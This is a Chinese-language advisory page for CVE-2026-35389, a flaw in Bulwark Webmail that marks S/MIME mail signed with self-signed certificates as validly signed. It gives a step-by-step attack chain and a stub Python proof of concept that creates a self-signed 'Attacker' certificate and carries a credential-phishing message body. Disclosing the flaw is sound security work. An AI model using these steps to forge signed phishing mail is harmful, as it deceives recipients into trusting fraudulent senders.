CVE-2026-35389 CVSS 7.5 高危

CVE-2026-35389 Bulwark Webmail S/MIME证书验证绕过漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35389

漏洞类型

验证绕过

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Bulwark Webmail

漏洞概述

Bulwark Webmail（Stalwart Mail Server 的自托管 Web 客户端）在 1.4.11 版本之前存在 S/MIME 签名验证逻辑缺陷。由于系统未严格验证证书信任链，导致使用自签名或不受信任证书签名的电子邮件被错误地标记为有效签名。攻击者可利用此漏洞伪造邮件签名，破坏邮件来源的可信度。

技术细节

该漏洞源于 Bulwark Webmail 在处理 S/MIME 签名邮件时的配置缺陷。在验证 S/MIME 签名时，应用程序未启用证书链验证（即 checkChain 设置为 false）。根据 S/MIME 标准，有效的签名不仅需要私钥匹配，还需要签名证书由可信的证书颁发机构（CA）签发。由于该缺陷，攻击者可以使用自签名证书或任意生成的伪造证书对恶意邮件进行签名。当受害者查看邮件时，客户端会跳过对证书链的追溯验证，直接显示“签名有效”的标识，从而误导用户相信邮件来源合法。这使得攻击者能够伪造发件人身份发送钓鱼邮件或恶意内容，严重破坏了基于 PKI 体系的邮件完整性保障机制。

攻击链分析

STEP 1

1. 证书准备

攻击者生成一个自签名的 X.509 证书和对应的私钥，该证书不受任何受信任的 CA 签发。

STEP 2

2. 邮件伪造

攻击者使用生成的自签名证书对精心构造的钓鱼邮件或恶意邮件进行 S/MIME 签名。

STEP 3

3. 邮件投递

攻击者将伪造并签名的邮件发送给目标受害者。

STEP 4

4. 验证绕过

受害者使用 Bulwark Webmail (< 1.4.11) 查看邮件，客户端检查签名发现加密匹配，但跳过了证书链信任检查。

STEP 5

5. 误导用户

Webmail 界面显示邮件具有“有效签名”，受害者误以为邮件来源可信，从而泄露信息或下载恶意软件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
PoC for CVE-2026-35389: S/MIME Signature Verification Bypass
This script demonstrates how to sign an email with a self-signed certificate
which would be accepted by the vulnerable client.
"""

from OpenSSL import crypto
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
import base64

def generate_self_signed_cert():
    # Create a key pair
    k = crypto.PKey()
    k.generate_key(crypto.TYPE_RSA, 2048)
    
    # Create a self-signed cert
    cert = crypto.X509()
    cert.get_subject().CN = "Attacker"
    cert.set_serial_number(1000)
    cert.gmtime_adj_notBefore(0)
    cert.gmtime_adj_notAfter(10*365*24*60*60)
    cert.set_issuer(cert.get_subject())
    cert.set_pubkey(k)
    cert.sign(k, 'sha256')
    
    return cert, k

def sign_message(msg_content, cert, key):
    # Simplified representation of S/MIME signing logic
    # In a real exploit, use libraries like M2Crypto to generate proper PKCS#7 structure
    print(f"[+] Signing message with self-signed certificate: {cert.get_subject().CN}")
    print(f"[+] Note: Vulnerable client (checkChain: false) will accept this as valid.")
    return b"---SIGNED CONTENT SIMULATION---"

if __name__ == "__main__":
    cert, key = generate_self_signed_cert()
    print("[+] Generated self-signed certificate and private key.")
    
    subject = "Important Update"
    body = "Please click the link to update your credentials."
    
    signature = sign_message(body, cert, key)
    print("[+] Email signed successfully. Vulnerable Webmail will show 'Valid Signature'.")

影响范围

Bulwark Webmail < 1.4.11

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用 Webmail 客户端中的 S/MIME 自动签名显示功能，并提醒用户不要仅凭签名状态判断邮件来源的真实性，需通过其他渠道（如电话）确认关键信息。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表